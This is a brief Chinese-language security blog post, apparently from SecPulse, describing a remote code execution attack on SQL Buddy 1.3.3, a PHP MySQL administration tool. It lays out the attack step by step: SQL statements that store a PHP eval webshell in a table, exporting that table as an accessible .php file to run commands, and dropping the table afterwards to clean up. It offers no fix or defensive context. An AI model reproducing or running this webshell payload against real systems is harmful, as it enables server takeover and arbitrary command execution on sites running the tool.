SqlBuddy是php编写的一款用于MySQL管理的开源工具,使用它可以很容易的编写SQL脚本。
官网是:http://sqlbuddy.com
最新版本是SQL Buddy 1.3.3 ,看起来更像是Adminer之类胜似于PHPMyAdmin
官方定义SQL Buddy为Web based MySQL administration
老外发了一下简单利用SQL Buddy 1.3.3 Remote Code Execution
1.设计可登陆远程MySQL主机
随便来个虚拟主机的mysql
CREATE TABLE `test`.`test` (`sp123` TEXT NOT NULL );
INSERT INTO `test`.`test` (`sp123` )VALUES ('<?php @eval($_POST[sp123])?>');
2.允许Export出php格式文件(可任意访问),造成命令执行
记得
DROP TABLE `test`;
当然如果你能猜到目标的密码又有写权限的话也就不用这样玩了。
本文作者:SP小编
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/2890.html
必填 您当前尚未登录。 登录? 注册
必填(保密)